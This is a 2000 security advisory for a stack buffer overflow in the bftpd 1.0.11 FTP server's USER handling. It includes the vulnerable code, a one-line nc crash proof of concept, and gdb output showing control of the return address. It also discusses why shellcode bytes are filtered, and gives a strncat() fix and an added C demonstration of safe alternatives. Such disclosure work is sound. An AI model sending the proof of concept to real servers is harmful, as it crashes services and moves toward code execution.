Subject: Potential Security Problem in bftpd-1.0.11
From: BAILLEUX Christophe (cbGROLIER.FR)
Date: Fri Oct 27 2000 - 11:23:33 CDT

Subject : Potential security problem in bftpd (Buffer Overflow)
Author : Christophe BAILLEUX (cbgrolier.fr)
Platforms : *nix
Test version : bftpd-1.0.11

I. Introduction

bftpd is a Linux FTP server with chroot and setreuid support; not all FTP
commands are implemented. It serves either the user's home directory or its
ftp subdirectory, and user authentication is via passwd/shadow or PAM.

II. Problem

The latest version of bftpd has a stack-based buffer overflow in the handling
of the USER command: a username of more than 35 characters is appended with
strcat() to a fixed-size stack buffer, and the excess overwrites the saved
return address.

III. Details/Demo

a) Code problem


   102 void command_user(char *username) {
   103     char *alias;
   104     char name[USERLEN + 7] = "ALIAS_";
   105     if(state) {
   106         fprintf(stderr, "503 Username already given.\r\n");
   107         return;
   108     }
   109     alias = (char *) config_getoption(strcat(name, username));
   110     if(alias[0] != '\0')

b) Demo / gdb output

tshaw:~$ printf "user `perl -e 'print"A"x37'`\n" | nc localhost 21

tshaw:/home/cb/bftpd-1.0.11# gdb /usr/sbin/bftpd 6613
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
Attaching to program: /usr/sbin/bftpd, Pid 6624
Reading symbols from /lib/libcrypt.so.1...done.
Loaded symbols for /lib/libcrypt.so.1
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
0x400e7514 in read () from /lib/libc.so.6
(gdb) c

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x $esp
0xbffffcb8: 0x41414141

IV. Exploit

A generic stack-smashing exploit does not work here. commands.c strips every
byte below 32 from the command line before it is parsed, and because char is
signed on i386 the comparison also matches every byte in 0x80-0xff. A NOP sled
(0x90), typical shellcode and a stack return address such as 0xbffffcb8 (bytes
0xb8 0xfc 0xff 0xbf) are therefore removed before strcat() runs; only printable
ASCII reaches the buffer:

   for(i = 0; i < strlen(str); i++) { /* Remove Internet Explorer ... */
       if(str[i] < 32) {
           memmove((char *) ((int) str + i),
                   (char *) ((int) str + i + 1),
                   strlen(str) - i);
           i--; /* If junk is found, don't increment counter in next loop. */
       }
   }

V. Workaround

In bftpd-1.0.11/commands.c, modify line 109, replacing

alias = (char *) config_getoption(strcat(name, username));

with

alias = (char *) config_getoption(strncat(name, username, USERLEN));

name is declared as USERLEN + 7 bytes and already holds "ALIAS_" (6 bytes), so
limiting the copy to USERLEN bytes leaves room for the terminating NUL. Note
that strncat() truncates an over-long username silently rather than rejecting
it.
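The following C program is an added example, not code from bftpd or from the
advisory author. It reconstructs the shape of the vulnerable strcat() into
name[USERLEN + 7], places the advisory's strncat() fix and a reject-instead-of-
truncate variant beside it, and reimplements the commands.c byte filter with an
explicit signed char so that the i386 behaviour (bytes 0x80-0xff also removed)
is reproduced on any platform. USERLEN is assumed to be 32 here; the advisory
does not show bftpd's real value. The NOP-sled and 0xbffffcb8 byte strings in
main() are constructed inputs.

```c
#include <stdio.h>
#include <string.h>

#define USERLEN 32   /* assumed for illustration; bftpd's real USERLEN is not shown in the advisory */

/* Shape of the vulnerable code in bftpd 1.0.11 command_user(), reconstructed
 * for reference. name[] is USERLEN+7 bytes: "ALIAS_" (6) + USERLEN + NUL, so
 * strcat() writes past the end as soon as the username exceeds USERLEN bytes. */
void build_alias_key_unsafe(char name[USERLEN + 7], const char *username) {
    strcpy(name, "ALIAS_");
    strcat(name, username);            /* unbounded: stack overflow on a long USER */
}

/* The advisory's one-line fix: strncat() limited to USERLEN bytes.
 * 6 + USERLEN + 1 == USERLEN + 7, so the buffer can no longer overflow;
 * an over-long name is silently truncated to USERLEN bytes instead. */
void build_alias_key_strncat(char name[USERLEN + 7], const char *username) {
    strcpy(name, "ALIAS_");
    strncat(name, username, USERLEN);
}

/* Stricter alternative (assumed design, not bftpd's): reject rather than
 * truncate, so a 33-byte username cannot quietly be looked up under the
 * 32-byte user's alias entry. Returns the key length, or -1 if it does not fit. */
int build_alias_key_checked(char *out, size_t outlen, const char *username) {
    size_t ulen = strlen(username);
    if (ulen > USERLEN || 6 + ulen + 1 > outlen)
        return -1;
    memcpy(out, "ALIAS_", 6);
    memcpy(out + 6, username, ulen + 1);   /* copies the NUL too */
    return (int)(6 + ulen);
}

/* bftpd's commands.c filter, rewritten with read/write indices (same result,
 * without the quadratic memmove) and an explicit signed char: on i386 plain
 * char is signed, so "< 32" is also true for every byte 0x80..0xff.
 * Returns the number of bytes removed. */
size_t strip_control_bytes(char *str) {
    size_t r, w = 0;
    for (r = 0; str[r] != '\0'; r++)
        if ((signed char)str[r] >= 32)
            str[w++] = str[r];
    str[w] = '\0';
    return r - w;
}

/* How many bytes of a candidate payload would still reach strcat() after the filter. */
size_t surviving_bytes(const char *payload) {
    char buf[256];
    size_t n = strlen(payload);
    if (n >= sizeof buf)
        n = sizeof buf - 1;
    memcpy(buf, payload, n);
    buf[n] = '\0';
    strip_control_bytes(buf);
    return strlen(buf);
}

int main(void) {
    char user37[38];
    char key[USERLEN + 7];
    memset(user37, 'A', 37);           /* the advisory's 37-byte USER argument */
    user37[37] = '\0';

    printf("checked build of 37-byte name: %d (expect -1)\n",
           build_alias_key_checked(key, sizeof key, user37));
    build_alias_key_strncat(key, user37);
    printf("strncat build: \"%s\" (%zu bytes, truncated)\n", key, strlen(key));

    /* Constructed payload fragments: a NOP sled and the little-endian bytes
     * of the stack address 0xbffffcb8 from the gdb session above. */
    printf("NOP sled bytes surviving filter: %zu\n", surviving_bytes("\x90\x90\x90\x90"));
    printf("0xbffffcb8 bytes surviving filter: %zu\n", surviving_bytes("\xb8\xfc\xff\xbf"));
    printf("printable bytes surviving filter: %zu\n", surviving_bytes("AAAA"));
    return 0;
}
```

Run it and the last three lines show 0, 0 and 4: every byte of a NOP sled and
of the stack address is discarded, which is why only an ASCII-only payload
could ever reach the overflow. The checked builder is the safer replacement
if silent truncation of usernames is not acceptable.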

bftpd team has been informed.

VI. Greetings :)

Greetings to kalou, kli deda, Geudou deda and all DEDA TEAM!# :)
Thanks bdev for your help :)

Best regards,

BAILLEUX Christophe - Network & System Security Engineer
Grolier Interactive Europe-OG/CS
Voice:+33-(0)1-5545-4789 - mailto:cbgrolier.fr